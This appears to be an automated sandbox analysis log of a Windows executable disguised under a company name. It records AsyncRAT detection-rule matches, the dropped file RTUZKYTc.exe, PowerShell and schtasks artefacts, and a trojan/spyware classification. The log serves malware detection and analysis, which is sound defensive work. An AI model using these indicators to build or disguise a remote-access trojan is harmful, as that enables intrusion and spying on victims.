Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_017C4204
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_017CE134
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_017C7018
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_07860E28
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_0786A730
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_0786C648
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_078630D0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_07863F88
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_0786AF93
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_0786AFA0
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_0786CFF8
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Code function: 0_2_07863F77
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07860E210_2_07860E21
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07863CEA0_2_07863CEA
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07863CF00_2_07863CF0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786AB680_2_0786AB68
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_031846D09_2_031846D0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_03184CC89_2_03184CC8
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_031813E09_2_031813E0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_03181A499_2_03181A49
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0124420410_2_01244204
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0124E13410_2_0124E134
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0124701810_2_01247018
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777737110_2_07777371
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07770E2810_2_07770E28
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777A73010_2_0777A730
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777C64810_2_0777C648
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777C63710_2_0777C637
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777A6FF10_2_0777A6FF
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_077730D010_2_077730D0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773F7710_2_07773F77
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777CFF810_2_0777CFF8
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777CFE910_2_0777CFE9
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AFA010_2_0777AFA0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AF9110_2_0777AF91
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773F8810_2_07773F88
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07770E2710_2_07770E27
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773CF010_2_07773CF0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773CEB10_2_07773CEB
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AB6810_2_0777AB68
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AB5810_2_0777AB58
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07777AB810_2_07777AB8
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0E96212810_2_0E962128
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0E96367810_2_0E963678
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04E5B4A012_2_04E5B4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04E5B49012_2_04E5B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08E33A9812_2_08E33A98
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 16_2_02AF13E016_2_02AF13E0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 16_2_02AF1A4916_2_02AF1A49
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7B49017_2_04E7B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7B47017_2_04E7B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08E63E9817_2_08E63E98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_02B3B4A020_2_02B3B4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_02B3B49020_2_02B3B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0732440820_2_07324408
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_08493A9820_2_08493A98
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0164420422_2_01644204
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0164E13422_2_0164E134
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0164701822_2_01647018
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07960E2822_2_07960E28
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796A73022_2_0796A730
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796C64822_2_0796C648
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_079630D022_2_079630D0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796AF9122_2_0796AF91
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963F8822_2_07963F88
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796AFA022_2_0796AFA0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796CFF822_2_0796CFF8
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963F7722_2_07963F77
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07960E2122_2_07960E21
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963CF022_2_07963CF0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963CEA22_2_07963CEA
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796AB6822_2_0796AB68
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_093E20F822_2_093E20F8
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_093E364822_2_093E3648
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 26_2_00C413E026_2_00C413E0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 26_2_00C41A4926_2_00C41A49
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0177420427_2_01774204
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0177E13427_2_0177E134
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0177701827_2_01777018
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA0E2827_2_07AA0E28
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAA73027_2_07AAA730
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAC64827_2_07AAC648
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA30D027_2_07AA30D0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAAFA027_2_07AAAFA0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3F8827_2_07AA3F88
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAAF9127_2_07AAAF91
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AACFF827_2_07AACFF8
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3F7727_2_07AA3F77
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA0E2127_2_07AA0E21
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3CEA27_2_07AA3CEA
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3CF027_2_07AA3CF0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAAB6827_2_07AAAB68
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0EC8222827_2_0EC82228
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0EC8377827_2_0EC83778
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 31_2_00F513E031_2_00F513E0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 31_2_00F51A4931_2_00F51A49
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: invalid certificate
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2079413535.00000000059CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2071781432.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2092667055.000000000BA90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073615538.000000000498A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000000.2038933223.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4544624751.0000000006569000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4540909750.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2383977857.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2395996846.0000000005974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exej% vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2392500334.0000000004AEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2475189992.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2477067466.0000000005A66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exe.m vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exeBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe.9.drBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: RTUZKYTc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SS Bottmac Engineers Pvt. Ltd..exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/32@13/1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\RTUZKYTc.exe
